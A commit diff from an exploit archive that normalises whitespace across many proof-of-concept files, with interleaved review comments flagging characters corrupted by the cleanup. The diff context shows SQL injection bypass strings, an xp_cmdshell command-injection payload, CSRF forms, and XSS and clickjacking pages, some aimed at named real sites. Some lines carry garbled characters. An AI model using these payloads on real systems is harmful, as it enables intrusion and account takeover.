DB: 2021-08-20

204 changes to exploits/shellcodes

Charity Management System CMS 1.0 - Multiple Vulnerabilities
Offensive Security 2021-08-20 05:01:51 +00:00
parent 6f730aa235
commit 4e7ab00187
205 changed files with 1446 additions and 1318 deletions

View file

@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
// dans tous les cas :
echo "<p class='normal'><a class='erreur'> ";
echo "<p class='normal'><a class='erreur'> ";
$msg = "";
// test du nom

View file

@ -54,8 +54,8 @@ Add/Edit Admin CSRF:
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

View file

@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
</td>
<td>
   </td>
</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
   </td>
</td>
<td>
Resource Type<br />
@ -96,16 +96,16 @@ Resource Type<br />
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
   </td>
</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
   </td>
</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
   </td>
</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">

View file

@ -11,7 +11,7 @@ Arbitrary File Upload
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
<input type=submit value=Upload> </p>
</form>

View file

@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
<input type=text name=Adminlevel value="Root">
</td>
</tr>
<td width="168"> </td>
<td width="220"> </td>
<td width="168"> </td>
<td width="220"> </td>
</tr>
<tr>
<td colspan="2">

View file

@ -22,8 +22,8 @@ Sex
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</form>
</frewal>

View file

@ -7,7 +7,7 @@
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://site.com/Examples/PowUpload/Simpleupload.htm
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,

View file

@ -6,7 +6,7 @@
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,

View file

@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :
<tr>
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
<td> </td>
<td> </td>
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
</tr>
<tr>
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
<td> </td>
<td> </td>
<td>
<select name="">
<option value="0">(CMD)</option>
</select> <br><br>
</select> <br><br>
<input type="submit" value="Apply"></center>
</td>
</tr>

View file

@ -1,4 +1,4 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~] ----------------------------بسم الله الرحمنالرحيم------------------------------
 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 Â
 [~]Vendor: www.activewebsoftwares.com
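Review bot: The replacement for the first header line runs two words together: the old line reads `الرحمن الرحيم` and the new one reads `الرحمنالرحيم`, so the separator inside the phrase was deleted rather than converted to a plain space. A whitespace cleanup should trim line ends and convert interior separators one for one, never drop them. The unchanged context lines below still carry stray `Â` characters, so the cleanup is also incomplete for this file.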
@ -30,7 +30,7 @@
Â
 [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
 [~]
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيرÙÅ
 [~]
 [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 [~]
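Review bot: The new "spechial thanks" line ends in `ÙÅ` where the old line ended with the name `الزهيري`, so the last character of the name was damaged by the cleanup. Decode the file as UTF-8 before trimming and strip only whole whitespace characters; a byte-wise trim can cut into a multi-byte character.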

View file

@ -4,25 +4,25 @@
[~] Vendor: www.adserversolutions.com
[☠] Software: Affiliate Software Java 4.0
[☠] Software: Affiliate Software Java 4.0
[☠] author: ((я3d D3v!L))
[☠] author: ((я3d D3v!L))
[☠] Date: 12.12.2008
[☠] Date: 12.12.2008
[☠] Home: www.ahacker.biz
[☠] Home: www.ahacker.biz
[☠] contact: N/A
[☠] contact: N/A
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[☠] Exploit:
[☠] Exploit:
☠ username: r0' or ' 1=1--
☠ password: r0' or ' 1=1--
☠username: r0' or ' 1=1--
☠password: r0' or ' 1=1--
[☠]login 4 d3m0:
[☠]login 4 d3m0:
http://www.adserversolutions.com/affiliate_java/logon.jsp
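Review bot: The replacement `{DEV!L'5 of SYST3M}` banner line ends in `â˜` instead of a final `☠`. U+2620 is encoded in UTF-8 as E2 98 A0, and a trim that treats a trailing 0xA0 byte as a non-breaking space leaves exactly the two-byte prefix seen here, so the trim should run on decoded text rather than on bytes. The `username:` and `password:` lines also lost the space after `☠`; that separator should become a plain space, not disappear.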

View file

@ -14,7 +14,7 @@
[~] contact: N/A
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[~] Exploit:
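Review bot: The replacement `{R0}` banner line ends in `â˜`, so the final `☠` of the row was cut short. Restore it from the old line and add a check that every touched file still decodes as UTF-8 after the cleanup.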
@ -22,7 +22,7 @@
[~] password: r0' or ' 1=1--
[☠] login 4 d3m0:
[☠] login 4 d3m0:
www.adserversolutions.com/admgmt_460/logon.jsp

View file

@ -14,7 +14,7 @@
[~] contact: N/A
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[~] Exploit:
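Review bot: The replacement `{R0}` banner line ends in `â˜` rather than `☠`; the last character of the row was damaged by the trailing-whitespace trim and should be restored from the old line.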
@ -22,7 +22,7 @@
[~] password: r0' or ' 1=1--
[☠]login 4 d3m0:
[☠]login 4 d3m0:
www.adservingsolutions.com/xchange_java/logon_license.jsp

View file

@ -1,42 +1,42 @@
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[☠]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[☠]
[☠]
[~] Vendor: www.hotwebscripts.co.uk
[☠]
[☠] Software: HotWeb Rentals
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 15.2.2009
[☠]
[☠] Home: CL053D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[☠]
[☠] Software: HotWeb Rentals
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 15.2.2009
[☠]
[☠] Home: CL053D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[☠] ERR0R CONSOLE
[☠] ERR0R CONSOLE
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
[☠] Exploit:
[☠] Exploit:
[☠] TRU3 : details.asp?PropId=1+and+1=1
[☠] TRU3 : details.asp?PropId=1+and+1=1
[☠] FALS3 : details.asp?PropId=1+and+1=2
[☠] FALS3 : details.asp?PropId=1+and+1=2
[☠]liv3 3xpL0!T:
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[☠]liv3 3xpL0!T:
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[☠]
[☠]
N073:
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
4R48!4N-HACK3R!!القراصنه العرب
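Review bot: In the `{DEV!L'5 of SYST3M}` banner the replacement line ends in `â˜` where the old line ended in `☠`. That is a content change in a hunk that is otherwise whitespace only, so the trim rule should be fixed to leave multi-byte characters intact before this file is rewritten.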
@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
[~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[~]spechial FR!ND: 74M3M تميم

View file

@ -36,7 +36,7 @@ def main():
</head>
<body onLoad="triggerCrash()">
<div id="evilDiv">
 
</div>
</body>
</html>

View file

@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
features set.
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
############################Advisory:###################################################

View file

@ -26,8 +26,8 @@ Exploit:
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br> 
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br>
<input name="Factory" value=" Yes " type="submit" width="60">
</form>
@ -41,7 +41,7 @@ Exploit:
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
<td bgcolor="#F0F0F0" valign="top">
<table border="0">
<tbody><tr><td>
@ -49,15 +49,15 @@ Exploit:
<table border="0" cellpadding="3" cellspacing="0">
<tbody><tr>
<td width="20"></td><td>IP Address</td>
<td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
<td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
</tr>
<tr>
<td></td><td>Subnet Mask</td>
<td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
<td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
</tr>
<tr>
<td></td><td>Default Gateway</td>
<td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
<td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
</tr>
</tbody></table>
</td></tr>
@ -68,8 +68,8 @@ Exploit:
</tbody></table>
<table border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td height="50" width="149"> </td>
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
<td height="50" width="149"> </td>
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td>
</tr>
</tbody></table>
</form>

View file

@ -2,11 +2,11 @@
# Date: 20-04-2014
# Author: Rakesh S
# Software Link: http://www.teracom.in/
# Version:  T2-B-Gawv1.4U10Y-BI
# Version: T2-B-Gawv1.4U10Y-BI
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
 
The exploitation example below changes password for the SSID:
 
 
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>

View file

@ -1,6 +1,6 @@
# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
# Date: 2018-06-24
# Vendor Homepage:  http://www.digisol.com
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
# Category: Hardware
# Exploit Author: Adipta Basu
@ -8,9 +8,9 @@
# Web: https://hackings8n.blogspot.com
# Tested on: Mac OS High Sierra
# CVE: CVE-2018-12705
 
# Reproduction Steps:
 
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite

View file

@ -1,17 +1,17 @@
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
# Date: 2018-06-25
# Vendor Homepage:  http://www.digisol.com
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
# Category: Hardware
# Exploit Author: Adipta Basu
# Tested on: Mac OS High Sierra
# CVE: N/A
 
# Reproduction Steps:
 
   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
   - Open BurpSuite
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite
- Change the SSID to "Testing" and hit "Apply"
- Burp will capture the intercepts.
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is

View file

@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>

View file

@ -155,7 +155,7 @@ START=90
ftpd &
" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>

View file

@ -21,7 +21,7 @@ use threads;
use LWP::UserAgent;
print "    Mohammad Reza Espargham\n   www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
print " Mohammad Reza Espargham\n www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
$port=8080; #port
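Review bot: The change reaches inside a string literal: the banner passed to `print` has its interior spacing collapsed in the replacement line. It is harmless for a banner, but a whitespace cleanup should leave quoted strings alone or convert non-breaking spaces one for one, because the same rewrite applied to other files would alter data.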

View file

@ -129,7 +129,7 @@ Add Directory</a> | <a id="AllSelect" href="javascript:selectAll()">Select All
| <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();"
id="del" style="color:#F30;">Delete</a></span>
<span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
   <a href="javascript:window.location.href='..'"
<a href="javascript:window.location.href='..'"
style="color:#F60"> <<Up
Level</a></span><span id="photoCount"></span>

View file

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,

View file

@ -2,9 +2,9 @@
# Date:30/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.ibm.com/
# Version:8.5.3/8.5.2 FP3 (0day) 
# Version:8.5.3/8.5.2 FP3 (0day)
# Tested on: Windows 7 / Windows 2008
# CVE : CVE-2011-1519
# CVE : CVE-2011-1519
Application: IBM Lotus Domino Controller
@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3
Manager 4.0 prior to Update 4
(0day)
Vendor URL: http://ibm.com
Bug: own XML parser  
Bug: own XML parser
CVE: CVE-2011-1519
CVSS2: 9.0
Exploits: YES
@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
EXPLOIT:
@ -66,8 +66,3 @@ height = "99%"
</applet>
</body>
</html>
 

View file

@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 
# CVE : CVE-2012-4051 for the CSRF
<head>

View file

@ -14,9 +14,9 @@ highlighted remember password.
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]

View file

@ -132,8 +132,8 @@ addr_os = {
# ID # OS # STACK SIZE # GADGET TABLE
1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
2 : ["Labs test ", 0xbf, labs_rop_chain],
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
-3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
-4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
-5 : ["Ubuntu 10.10 | 11.04 ", -1, False], #

View file

@ -38,7 +38,7 @@ print "Sent\n";
while (<$remote>)
{
 print $_;
print $_;
}
print "\n";

View file

@ -16,7 +16,7 @@ While logged in as admin user:
3) log in as that user
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh

View file

@ -2,7 +2,7 @@
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06

View file

@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>

View file

@ -8,7 +8,7 @@ Opera</font><font face="Calibri" size="6" color="#FF0000">
<font face="Arial" size="2"><code class="xml plain">
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -32,8 +32,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

View file

@ -8,7 +8,7 @@ Safari</font><font face="Calibri" size="6" color="#FF0000">
<font face="Arial" size="2"><code class="xml plain">
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -33,8 +33,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

View file

@ -7,7 +7,7 @@
<font face="Arial" size="2"><code class="xml plain">
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -31,8 +31,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

View file

@ -11,9 +11,9 @@ Create Database:
<td><div id="dbname_error"></div></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
<td> </td>
<td> </td>
</tr>
</table>
</div>
@ -36,9 +36,9 @@ Add Redirect:
http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
<option selected value=".*">** All Public Domains **</a>
<option value="siteismi.com">sEc-r1z.com</option></select>
</select>/ <input name=path type=text size="20" id="urlpath">
 <br />redirects to&#8594; 
<input id="url" name="url" type="text" size="50">  
</select>/ <input name=path type=text size="20" id="urlpath">
<br />redirects to&#8594;
<input id="url" name="url" type="text" size="50">
<br />
<noscript>
@ -66,7 +66,7 @@ Add Redirect:
</p>
</form></div>
<p class="description">
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
</p>
<!-- <br /> -->
<h2>Current Redirects</h2>

View file

@ -6,15 +6,15 @@
# Software: Ajax Upload
# http://valums.com/ajax-upload/
# Tested on: Linux
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
 
 
[Arbitrary File Upload]
You can upload any file you want by bypasss extesion wing headers, if

View file

@ -1,18 +1,18 @@
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
 
 
 
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
POC:
 
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
3. Payload : <script> alert(1)</script>
4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
3. Payload : <script> alert(1)</script>
